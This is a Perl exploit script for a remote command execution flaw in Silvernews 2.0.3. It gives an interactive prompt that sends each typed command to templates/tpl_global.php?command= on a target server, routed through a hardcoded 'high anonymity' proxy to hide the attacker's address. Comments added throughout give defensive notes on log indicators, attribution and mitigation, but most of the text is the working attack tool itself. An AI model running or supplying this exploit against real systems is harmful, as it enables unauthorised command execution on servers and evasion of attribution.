Exploit for the remote command execution vulnerability in Silvernews 2.0.3:
discovered by: http://www.securityfocus.com/archive/1/407163/30/0/threaded
sploit:
--------
#!/usr/bin/perl
################TSL###########################################################
#                                                                            #
#  SilverNews Exploit included Proxy Server Function                         #
#  THROAT SECURITY LABS                                                      #
#                                                                            #
#  vuln: http://www.target.com/templates/tpl_global.php?command=[command]    #
#                                                                            #
################TSL###########################################################
#
# Review notes (defensive reading of this listing):
#  - Traffic shape: one HTTP GET per line typed at the prompt, for
#    <target>/<path>/templates/tpl_global.php?command=<input>. That is the
#    entry point the banner above names as vulnerable.
#  - Log hunting: search web server access logs for requests to
#    templates/tpl_global.php that carry a "command" query parameter.
#    Presumably a template file is not normally requested directly; confirm
#    against the deployment before alerting on the path alone.
#  - Attribution: the TCP connection is opened to the host in $proxy, not to
#    the target, so the client address recorded by the target would
#    presumably be the proxy's. Treat source IPs in such log entries as
#    unreliable for attribution.
#  - The User-Agent is a fixed MSIE 6.0 string; on its own it is a weak
#    indicator and should only be used together with the path/parameter match.
#  - Mitigation: follow the advisory linked above for affected versions and
#    fixes. Independently, denying direct HTTP access to the templates/
#    directory should remove this entry point; verify the application does
#    not depend on direct access first.

# CRLF line terminator used for every line written to the socket.
$l="\015\012";
# Flag read by the response loop in sploit(): 0 = still in the response
# headers, 1 = blank line seen, print what follows.
$t=0;
my $sock;
my $target;
my $location;
my $command;
my $proxy;
#define your proxyserver:
$proxy = "200.186.217.122"; #brazil high anonymity proxy
use IO::Socket;

# sploit: send one request built from the file-level $target, $location and
# $command through the proxy in $proxy, then print the response body.
# Takes no arguments and returns nothing useful; it exits the whole program
# with status 1 when the response status line is not 200.
sub sploit() {
    # Connection goes to the proxy on port 80, never directly to the target.
    $sock = IO::Socket::INET->new(PeerAddr => $proxy, PeerPort => 80, Proto => "tcp") or die "No Connection to Your ProxyServer: $proxy at Port 80\n";
    # The operator-typed command is placed verbatim in the "command" query
    # parameter of tpl_global.php; this request line is what a defender would
    # see in access logs.
    print $sock "GET $target/$location/templates/tpl_global.php?command=$command HTTP/1.1$l";
    print $sock "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)$l";
    print $sock "Connection: close$l";
    # Read the response line by line.
    while (<$sock>) {
        # Status line with any code other than 200: report it and stop.
        if (/^HTTP\/1\.[0-2] ([0-9]{3}) .+$/ and $1 ne "200"){
            print "Error! Got HTTP return code $1. Exciting!\n";
            exit 1;
        }
        # Echo the line only once the header/body separator has been seen.
        print if $t==1;
        # A line consisting only of CRLF marks the end of the headers.
        $t=1 if /^$l$/;
    }
}

# Entry point: exactly two arguments are required (target host and the path
# of the Silvernews installation); anything else prints the usage text.
if (@ARGV != 2) {
    print "\n*** by lizard for [T]hroat [S]ecurity [L]abs\n";
    print "-------------------------------------------------------\n\n";
    print "* usage:\t $0 [target] [path] \n";
    print "* example:\t $0 www.target.com newssystem \n";
    print "----\n\n\n pia s. i love you forever ;)\n\n";
} else {
    $target = $ARGV[0];
    $location = $ARGV[1];
    print "sending exploit ... please wait\n";
    sleep(1);
    # Interactive prompt: every non-empty line read from STDIN becomes one
    # request, so a session shows up server-side as a series of separate GETs
    # to the same path with differing "command" values.
    while(1){
        print "[sploit\@$target:/$location\] ";
        $_=<STDIN>;
        # Drop the last character of the input (the trailing newline).
        chop;
        # Ignore empty input and prompt again.
        next if /^$/;
        # Encode a space as %20 before the line goes into the query string.
        s/ /%20/;
        #if ($command=="exit") {exit} else {sploit()};
        $command=$_;
        sploit();
    }
}
#EOF#